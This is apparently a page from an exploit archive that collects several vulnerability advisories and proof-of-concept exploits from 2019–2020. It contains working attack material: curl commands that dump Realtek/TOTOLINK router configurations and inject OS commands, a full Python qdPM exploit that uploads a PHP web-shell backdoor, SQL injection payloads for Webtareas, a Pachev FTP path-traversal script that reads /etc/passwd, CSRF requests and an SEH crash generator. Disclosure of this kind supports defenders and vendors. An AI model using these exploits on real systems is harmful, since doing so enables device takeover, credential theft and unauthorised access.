Realtek SDK based routers suffer from information disclosure, incorrect access control, insecure password storage, code execution, and incorrectly implemented CAPTCHA vulnerabilities.

MD5 | 655a4e51c6bf4ef1304ab18aee588265

           ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
MULTIPLE VULNERABILITIES IN SEVERAL SERIES OF
REALTEK SDK BASED ROUTERS (TOTOLINK AND MANY
OTHER)


Blazej Adamczyk (br0x)
blazej.adamczyk@gmail.com
https://sploit.tech/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━


11.12.2019





1 Sensitive data disclosure and incorrect access control in several series
of Realtek SDK based routers
══════════════════════════════════════════════════════════════════════════

CVE: CVE-2019-19822

SDK vendor: Realtek

Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc.,
MAX-C300N, T-BROAD and possibly others..

Product: Realtek SDK based routers backed by Boa HTTP server (and
possibly others) and using apmib library for memory management.

Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15

Description: Realtek SDK based routers which use form based instead
HTTP Basic authentication (that includes Realtek APMIB 0.11f and Boa
HTTP server 0.94.14rc21) allows remote attackers to retrieve the
configuration, including sensitive data (usernames and passwords).

This affects:
• TOTOLINK A3002RU through 2.0.0,
• TOTOLINK 702R through 2.1.3,
• TOTOLINK N301RT through 2.1.6,
• TOTOLINK N302R through 3.4.0,
• TOTOLINK N300RT through 3.4.0,
• TOTOLINK N200RE through 4.0.0,
• TOTOLINK N150RT through 3.4.0, and
• TOTOLINK N100RE through 3.4.0;
• Rutek RTK 11N AP through 2019-12-12;
• Sapido GR297n through 2019-12-12;
• CIK TELECOM MESH ROUTER through 2019-12-12;
• KCTVJEJU Wireless AP through 2019-12-12;
• Fibergate FGN-R2 through 2019-12-12;
• Hi-Wifi MAX-C300N through 2019-12-12;
• HCN MAX-C300N through 2019-12-12;
• T-broad GN-866ac through 2019-12-12;
• Coship EMTA AP through 2019-12-12; and
• IO-Data WN-AC1167R through 2019-12-12; and
• possibly others.

Technical details: The apmib library at some point of initialization
dumps the whole memory contents the file /web/config.dat. This folder
is actually used by the boa http server as index directory.
Additionally if the router is configured for form-based authentication
the access control verifies credentials only for some URLs but ".dat"
files are not restricted. This issue does not affect routers which use
HTTP Basic authentication to secure all URLs.

PoC:
┌────
│ $ curl http://routerip/config.dat
└────


2 Password stored in plaintext in Realtek SDK based routers
═══════════════════════════════════════════════════════════

CVE: CVE-2019-19823

SDK vendor: Realtek

Device vendor: TOTOLINK, Sapido, CIK Telecom, Fibergate Inc.,
MAX-C300N, T-BROAD and possibly others..

Product: Realtek SDK based routers backed by Boa HTTP server (and
possibly others) and using apmib library for memory management.

Boa Version: <= Boa/0.94.14rc21 SDK Version: < 2020/02/15

Description: Realtek SDK based routers (that includes Realtek APMIB
0.11f and Boa HTTP server 0.94.14rc21) store passwords in plaintext.

This affects:
• TOTOLINK A3002RU through 2.0.0,
• TOTOLINK 702R through 2.1.3,
• TOTOLINK N301RT through 2.1.6,
• TOTOLINK N302R through 3.4.0,
• TOTOLINK N300RT through 3.4.0,
• TOTOLINK N200RE through 4.0.0,
• TOTOLINK N150RT through 3.4.0, and
• TOTOLINK N100RE through 3.4.0;
• Rutek RTK 11N AP through 2019-12-12;
• Sapido GR297n through 2019-12-12;
• CIK TELECOM MESH ROUTER through 2019-12-12;
• KCTVJEJU Wireless AP through 2019-12-12;
• Fibergate FGN-R2 through 2019-12-12;
• Hi-Wifi MAX-C300N through 2019-12-12;
• HCN MAX-C300N through 2019-12-12;
• T-broad GN-866ac through 2019-12-12;
• Coship EMTA AP through 2019-12-12; and
• IO-Data WN-AC1167R through 2019-12-12; and
• possibly others.

Technical details: Data stored in memory in COMPCS (apmib library)
format contains device administration and other passwords in
plaintext. The apmib library additionally at some point of
initialization dumps the whole memory contents the file
/web/config.dat which might be used to easily retrieve user passwords.


3 Code execution in several TOTOLINK routers
════════════════════════════════════════════

CVE: CVE-2019-19824

Vendor: TOTOLINK

Product: TOTOLINK Realtek SDK based routers

Boa Version: <= Boa/0.94.14rc21

Description: On several Realted SDK based TOTOLINK routers, an
authenticated attacker may execute arbitrary OS commands via the
sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI
(syscmd.htm) is not available. This allows for full control over the
device's internals.

This affects:
• A3002RU through 2.0.0,
• A702R through 2.1.3,
• N301RT through 2.1.6,
• N302R through 3.4.0,
• N300RT through 3.4.0,
• N200RE through 4.0.0,
• N150RT through 3.4.0,
• N100RE through 3.4.0, and
• possibly others.

PoC:
┌────
│ $ curl 'http://routerip/boafrm/formSysCmd' --user "admin:password"
│ --data 'submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&
│ save_apply=Run+Command&sysCmd=cp%20%2Fetc%2Fpasswd%20%2Fweb%2Fxxxx.dat'
└────


4 Incorrectly implemented captcha protection in TOTOLINK routers
════════════════════════════════════════════════════════════════

CVE: CVE-2019-19825

Vendor: TOTOLINK

Product: TOTOLINK Realtek SDK based routers

Boa Version: <= Boa/0.94.14rc21

Description: Guessable captcha vulnerability (CWE-804) in several
series of TOTOLINK routers allows a remote attacker to automatically
login to the router without reading and providing real captcha.

The following command returns captcha in plain text:
┌────
│ $ curl 'http://routerip/boafrm/formLogin' --data '{"topicurl":"setting/getSanvas"}'
└────

Additionally by using the HTTP Basic in a HEADER the attacker can
execute router actions without providing captcha at all.

This affects:
• A3002RU through 2.0.0,
• A702R through 2.1.3,
• N301RT through 2.1.6,
• N302R through 3.4.0,
• N300RT through 3.4.0,
• N200RE through 4.0.0,
• N150RT through 3.4.0,
• N100RE through 3.4.0, and
• possibly others.


5 Exploiting all together on TOTOLINK routers
═════════════════════════════════════════════

CVSS v3 socre: 9.6 AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (assuming
Administrative Access on WAN is enabled the score is 10.0)

Exploiting all the vulnerabilities together allows a remote
unauthenticated attacker to execute any code with root permissions and
reveal administration password.

The only thing that is needed is the access to router administration
interface (either access to local network or Administrative Access on
WAN enabled)

Description, video and possibly an exploit:
https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html

Timeline:
• 17.12.2019 - Contacted all identified vendors, i.e. TOTOLINK, CIK
Telecom, Sapido, Fibergate and Coship.
• 18.12.2019 - received TOTOLINK first line support response totally
not related to my message and showing me how to log into my router.
I responded right away and asked to forward the message to
technical/security team.
• 19.12.2019 - received response from CIK Telecom stating that the
routers support encryption (SIC!). I replied asking to forward the
message to technical/security team.
• 19.12.20219 - CIK Telecom responded that for further assistance I
should contact them over the phone. I replied that I need to explain
the details as a written message as this is technical.
• 27.12.2019, 06.01.2020 - I resent the messages to TOTOLINK and CIK
Telecom but none have replied till the date of disclosure.
• 06.01.2020 - I finally contacted Realtek as the Supplier of the SDK.
• 10.01.2020 - I got a response and I replied with encrypted details
on the bugs.
• 14-15.01.2020 - Realtek replied that the issue with dumping
configuration by apmib exists but it is not directly exploitable in
the defualt SDK configuration becuase it uses HTTP Basic
authentication which protects all URLs. They agreed however that
most of the Vendors modify the software including authentication
mechanism thus making it vulnerable.
• 23.01.2020 - Realtek responded that they are goining to fix the
issue with dumping configuration to the config.dat file in version
released on 15.02.2020. They also said that after fixing the issue
the impact of storing password in plaintext is less significant thus
they will not fix the CVE-2019-19823 yet but will try to fix it in
the future.

Temporary workaround: Unfortunately I did not get any good information
from real vendors like TOTOLINK and for now I would suggest to disable
administration interface from WAN and restricting LAN router
administration interface access using some kind of firewall if
possible.

Credit: Blazej Adamczyk | blazej.adamczyk@gmail.com | http://sploit.tech/

Source

Ricoh printer drivers for Windows suffer from a local privilege escalation vulnerability due to insecure file permissions. Many versions are affected.

MD5 | b12ed6ade117d7ea24df7a32b42b3494

Source

OLK Web Store 2020 suffers from a cross site request forgery vulnerability.

MD5 | a5ded10a3689cf112e487b214cf147cc

# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A

# Reference: https://websec.nl/news.php

POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1

dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=

Source

Webtareas version 2.0 suffers from a remote SQL injection vulnerability.

MD5 | 552b5f035dbe71deb74bea9f62383314

# Exploit Title: Webtareas 2.0 - 'id' SQL Injection
# Date: 2020-01-23
# Exploit Author: Greg.Priest
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtareas v2.0
# Tested on: Windows
# CVE : N/A

Webtareas v2.0 authenticated Sql injection 0day

Vulnerable Request:

POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 10.61.57.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://10.61.57.147
Connection: close
Referer: http://10.61.57.147/webtareas/general/home.php?
Cookie: webTareasSID=npmmte1hejtnsi35mcqbc97gse

action=cardview-actions&prefix=..%2F&object=projects&tblnam=projects&extra=&extpath=&id=1[Vulnerable parameter!]&defact=Y

--------------------------------------------------------------------------------------------------------------------------

C:Users--------Desktopsqlmap>sqlmap.py -r webt01
___
__H__
___ ___[,]_____ ___ ___ {1.4.1.17#dev}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:09:44 /2020-01-23/

[12:09:44] [INFO] parsing HTTP request from 'webt01'
[12:09:45] [WARNING] provided value for parameter 'extra' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [WARNING] provided value for parameter 'extpath' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[12:09:45] [INFO] resuming back-end DBMS 'mysql'
[12:09:45] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND 4597=4597 AND 'yvIt'='yvIt&defact=Y

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=cardview-actions&prefix=../&object=projects&tblnam=projects&extra=&extpath=&id=1' AND (SELECT 4838 FROM (SELECT(SLEEP(5)))WYXW) AND 'lBki'='lBki&defact=Y
---
[12:09:45] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.13
back-end DBMS: MySQL >= 5.0.12
[12:09:45] [INFO] fetched data logged to text files under 'C:Users--------AppDataLocalsqlmapoutput10.61.57.147'

[*] ending @ 12:09:45 /2020-01-23/

https://github.com/Gr3gPr1est/BugReport/blob/master/WebTareas2.0_Authenticated_SQLinjection_0day.pdf

Source

TP-Link TP-SG105E version 1.0.0 suffers from an unauthenticated remote reboot vulnerability.

MD5 | f1d3fd69d83ed6d639ed50a47a87f5cc

# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
# Date: 2020-01-20
# Exploit Author: PCEumel
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
# Version: TP-Link TP-SG105E V4
# Tested on: TP-SG105E V4 1.0.0 Build 20181120
# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
# CVE : N/A

# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
# It features a web front end and an application (Easy Smart Configuration Utility)
# for easy configuration management.

# The device does not properly restrict access to an internal API.
# It is therefore possible to remotely reboot the device by sending a HTTP POST
# request.

---

# POC :
curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi

---

Timeline :
2019-09-16 | Vendor notified
2019-09-25 | Reply (they will patch it)
2019-12-24 | First patch for testing
2019-12-19 | Confirmed the functionality of the patch
2020-01-14 | Public patch available

Source

Genexis Platinum-4410 version 2.1 suffers from an authentication bypass vulnerability.

MD5 | 5a735aa8f3741c5ef97c6c4fc488618c

# Exploit Title:  Genexis Platinum-4410 2.1 - Authentication Bypass
# Date: 20220-01-08
# Exploit Author: Husinul Sanub
# Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/
# Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Router https://genexis.co.in/product/ont/
# Firmware version: P4410-V2–1.28
# Vendor Homepage: https://genexis.co.in/
# Reference: https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206
# CVE: CVE-2020-6170

Vulnerability Details
======================
Genexis Platinum-4410 v2.1 Home Gateway Router discloses passwords of each users(Admin,GENEXIS,user3) in plain text behind login page source “http://192.168.1.1/cgi-bin/index2.asp". This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, changing passwords, upload malicious firmware etc.

How to reproduce
===================
Suppose 192.168.1.1 is the router IP and check view page source of login page “http://192.168.1.1/cgi-bin/index2.asp",There we can found passwords for each login accounts in clear text.


POC
=========
* https://youtu.be/IO_Ez4XH-0Y

Source

qdPM version 9.1 suffers from a remote code execution vulnerability.

MD5 | 7410cd87a931ff462b3b0c1fcec7f7f6

# Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Windows 10 (Python 2.7)
# CVE : CVE-2020-7246
# Exploit written in Python 2.7
# Tested Environment - Windows 10
# Path Traversal + Remote Code Execution

# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password
# -*- coding: utf-8 -*-
#!/usr/bin/python

import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()

def multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
uservar,
):
request_1 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, uservar),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[remove_photo]': (None, '1'),
}
return request_1


def req(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
):
request_1 = multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
'.htaccess',
)
new = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
, files=request_1)
request_2 = multifrm(
userid,
username,
csrftoken_,
EMAIL,
HOSTNAME,
'../.htaccess',
)
new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update'
, files=request_2)
request_3 = {
'sf_method': (None, 'put'),
'users[id]': (None, userid[-1]),
'users[photo_preview]': (None, ''),
'users[_csrf_token]': (None, csrftoken_[-1]),
'users[name]': (None, username[-1]),
'users[new_password]': (None, ''),
'users[email]': (None, EMAIL),
'extra_fields[9]': (None, ''),
'users[photo]': ('backdoor.php',
'<?php if(isset($_REQUEST['cmd'])){ echo "
"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "

"; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME
+ 'index.php/myAccount/update', files=request_3)

def main(HOSTNAME, EMAIL, PASSWORD):
result = session_requests.get(HOSTNAME + '/index.php/login')
login_tree = html.fromstring(result.text)
authenticity_token =
list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
)))[0]
payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
'login[_csrf_token]': authenticity_token}
result = session_requests.post(HOSTNAME + '/index.php/login',
data=payload,
headers=dict(referer=HOSTNAME
+ '/index.php/login'))
account_page = session_requests.get(HOSTNAME + 'index.php/myAccount'
)
account_tree = html.fromstring(account_page.content)
userid = account_tree.xpath("//input[@name='users[id]']/@value")
username = account_tree.xpath("//input[@name='users[name]']/@value")
csrftoken_ =
account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
req(userid, username, csrftoken_, EMAIL, HOSTNAME)
get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
final_tree = html.fromstring(get_file.content)
backdoor =
final_tree.xpath("//input[@name='users[photo_preview]']/@value")
print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/'
+ backdoor[-1] + '?cmd=whoami'

if __name__ == '__main__':
parser =
ArgumentParser(description='qdmp - Path traversal + RCE Exploit'
)
parser.add_argument('-url', '--host', dest='hostname',
help='Project URL')
parser.add_argument('-u', '--email', dest='email',
help='User email (Any privilege account)')
parser.add_argument('-p', '--password', dest='password',
help='User password')
args = parser.parse_args()

main(args.hostname, args.email, args.password)

Source

Umbraco CMS version 8.2.2 suffers from cross site request forgery vulnerabilities.

MD5 | d01b5a5f3c58a2fb42e85e7b0b6cdc7a

SEC Consult Vulnerability Lab Security Advisory 
=======================================================================
title: Cross-Site Request Forgery (CSRF)
product: Umbraco CMS
vulnerable version: version 8.2.2
fixed version: version 8.5
CVE number: CVE-2020-7210
impact: medium
homepage: https://umbraco.com/
found: October 2019
by: A. Melnikova (Office Moscow)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best
version of Umbraco and a big step forward in regard to making your work
with Umbraco simpler; simpler to extend, simpler to edit, simpler to
publish - simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the
victim. This attack always requires some sort of user interaction, usually
the victim needs to click on an attacker-prepared link or visit a page
under control of the attacker. Due to this, an attacker is able to
enable/disable or delete accounts. This may lead to DoS of user accounts.


Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted
on a malicious website, controlled by the attacker.

Example 1: HTML-code for disabling user:



history.pushState('', '', '/')
<form action="https:///umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=" method="POST">





Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
Host:
[...]
Cookie:


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}


Example 2: HTML-code for enabling user:


history.pushState('', '', '/')
<form action="https:///umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=" method="POST">





Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
Host:
[...]
Cookie:


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}


Example 3: HTML-code for deleting user:


history.pushState('', '', '/')
<form action="https:///umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=" method="POST">






Request:
--------
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
Host:
[...]
Cookie:


Response:
---------
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User was deleted","message":"","type":3}],"message":"User was deleted"}


As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload would get executed in the context of the victim's
session. Although responses to these requests are not delivered to the
attacker, in many cases it is sufficient to be able to compromise the
integrity of the victim's information stored on the site or to perform
certain, possibly compromising requests to other sites.



Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through security@umbraco.com.
2019-11-13: Requesting encryption keys.
2019-11-14: Encryption issues.
2019-11-15: Encryption issues, sending advisory in unencrypted form.
2019-11-25: No response, requesting status update.
2019-11-28: Vendor confirmed vulnerability.
2020-01-03: Confirming the release date.
2020-01-14: Release of updated CMS version 8.5.0.
2020-01-23: Release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately:
https://our.umbraco.com/download/releases/850


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF A. Melnikova / @2020

Source

Pachev FTP Server version 1.0 suffers from a path traversal vulnerability.

MD5 | daf03cb0a0aca2e05e3dbccdbc4c7b07

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
# Date: 2020-01-23
# Vulnerability: Path Traversal
# Exploit Author: 1F98D
# Vendor Homepage: https://github.com/pachev/pachev_ftp

from ftplib import FTP

ip = raw_input("Target IP: ")
port = int(raw_input("Target Port: "))

ftp = FTP()
ftp.connect(host=ip, port=port)
ftp.login('pachev', '')
ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
ftp.close()
file = open('passwd.txt', 'r')
print "[**] Printing the contents of /etc/passwdn"
print file.read()

Source

BOOTP Turbo version 2.0 SEH denial of service proof of concept exploit.

MD5 | 18bc50dca3e649d4b9eb74b35ddb2a9a

# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
# Exploit Author: boku
# Date: 2020-01-22
# Software Vendor: Wierd Solutions
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: BOOTP Turbo (x86) Version 2.0
# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit
# Replicate Crash:
# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86
# 2) Go to Edit > Settings > Click the Detailed Logging Box
# 3) Run python script, open created file 'crash.txt'
# 4) Select-All > Copy All, from file
# 5) Paste buffer in the 'Log File' text-box, Click 'OK'
# 6) Close the 'Control Service' Pop-Up Window
# 7) Crash with SEH Overwrite

# SEH chain of main thread
# Address SE handler
# 019CD254 43434343
# 42424242 *** CORRUPT ENTRY ***

# Loaded Application Modules
# Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path
# True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:Program FilesBOOTP TurboQtGui4.dll)
# True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:Program FilesBOOTP TurboQtCore4.dll)
# True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:Program FilesBOOTP TurboMSVCP100.dll)
# True | True | False | False | 2.0 [bootptui.exe] (C:Program FilesBOOTP Turbobootptui.exe)
# True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:Program FilesBOOTP TurboMSVCR100.dll)

#!/usr/bin/python

offset = 'x41'*2196
nSEH = 'x42x42x42x42'
SEH = 'x43x43x43x43'
filler = 'x44'*(3000-len(offset+nSEH+SEH))

payload = offset+nSEH+SEH+filler

try:
f=open("crash.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

Source